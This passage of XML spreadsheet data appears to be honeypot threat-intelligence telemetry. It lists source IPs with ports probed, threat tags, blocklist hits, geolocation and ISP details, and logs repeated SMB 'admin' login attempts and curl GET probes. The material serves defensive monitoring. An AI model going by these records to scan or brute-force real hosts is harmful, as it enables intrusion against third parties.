    <s v="2010-01-08"/>
    <s v="ADSL-STREAMYX"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af89:a287"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3322"/>
    <x v="3322"/>
    <s v="NA&amp;&amp;122-117-94-206.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T13:31:38"/>
    <d v="2024-09-10T00:34:00"/>
    <d v="2025-04-03T13:31:38"/>
    <n v="248"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;23&amp;&amp;28538&amp;&amp;50343&amp;&amp;80&amp;&amp;9100"/>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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7a75:5ece"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3323"/>
    <x v="3323"/>
    <s v="NA&amp;&amp;220-134-4-19.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-03T13:27:07"/>
    <d v="2024-12-05T15:02:18"/>
    <d v="2025-04-03T13:27:07"/>
    <n v="450"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;80&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc86:413"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3324"/>
    <x v="3324"/>
    <s v="220-133-28-97.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:26:32"/>
    <d v="2023-12-05T14:52:00"/>
    <d v="2025-04-03T13:26:32"/>
    <n v="660"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;49214&amp;&amp;23&amp;&amp;80&amp;&amp;54206&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc85:1c61"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3325"/>
    <x v="3325"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:24:47"/>
    <d v="2025-04-03T13:23:50"/>
    <d v="2025-04-03T13:24:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="CHH"/>
    <s v="Chihuahua"/>
    <s v="Cuauhtémoc Municipality"/>
    <s v="Anáhuac"/>
    <s v="4018543"/>
    <s v="NA"/>
    <s v="28.484"/>
    <s v="-106.747"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="residential"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bded:d712"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3326"/>
    <x v="3326"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T13:14:44"/>
    <d v="2024-04-13T01:40:04"/>
    <d v="2025-04-03T13:14:44"/>
    <n v="178"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1080&amp;&amp;443&amp;&amp;9100&amp;&amp;5900&amp;&amp;22&amp;&amp;389&amp;&amp;56315&amp;&amp;19109&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="Railtel"/>
    <s v="2015-11-10"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58555)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58561)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59291)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,42374)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58474)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,5892)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,53050)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,53066)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,21715)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,33887)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,43664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,52629)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,47928)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,47943)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,48235)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59834)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60663)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55311)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54020)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54837)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55256)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62791)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63306)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63697)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64078)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64608)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64987)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,65438)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,49540)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59419)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,44852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,50893)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,51316)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,44814)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,52818)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54736)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55150)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55621)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,56053)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,11978)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,56942)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,57333)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,57737)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58174)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58601)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59940)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60391)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,35086)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61965)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62532)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63051)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63732)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64054)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64493)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64974)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29277)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29294)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29520)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,37085)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,37316)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55102)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60022)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60104)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61206)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa8:5789"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3327"/>
    <x v="3327"/>
    <s v="59-126-41-64.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:52:23"/>
    <d v="2024-12-27T01:47:47"/>
    <d v="2025-04-03T12:52:23"/>
    <n v="176"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;18366&amp;&amp;80&amp;&amp;9100"/>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GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:2940"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3328"/>
    <x v="3328"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-03T12:50:48"/>
    <d v="2024-03-10T20:28:00"/>
    <d v="2025-04-03T12:50:48"/>
    <n v="167"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;58047&amp;&amp;445&amp;&amp;57917&amp;&amp;58337"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6385"/>
    <s v="77.0997"/>
    <s v="17426"/>
    <s v="Primesoftex Ltd"/>
    <s v="Primesoftex Ltd"/>
    <s v="business"/>
    <s v="Maharaja Agarsen College"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53745)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,61305)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,61307)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63739)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,50964)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,50989)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56020)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57917)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58337)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54947)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54949)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57379)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57578)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57588)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60021)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53591)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53594)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65452)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65464)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,51672)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,49298)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,49299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,51939)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65393)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56752)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56801)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60577)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54298)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54326)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57005)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,55302)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,55313)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,59965)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60941)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60953)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63706)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58863)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,59285)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,52470)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54974)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58541)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58574)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63174)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63311)}&amp;&amp;{Data_SMB:Incoming connection 